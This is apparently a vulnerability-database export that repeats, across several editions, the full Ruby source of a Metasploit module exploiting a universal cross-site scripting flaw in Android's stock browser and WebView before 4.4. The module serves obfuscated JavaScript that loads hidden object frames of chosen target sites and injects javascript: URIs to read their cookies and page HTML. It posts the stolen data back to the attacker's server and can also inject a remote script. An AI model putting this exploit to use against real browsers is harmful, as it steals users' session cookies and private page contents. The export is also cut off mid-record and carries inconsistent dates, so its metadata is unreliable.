"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T10:53:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T10:53:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T10:53:29", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T13:08:11", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T13:08:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T13:08:11", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T15:15:57", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T15:15:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T15:15:57", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T03:49:23", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-18T03:49:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T03:49:23", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T05:43:00", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-18T05:43:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T05:43:00", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T21:53:22", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T21:53:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
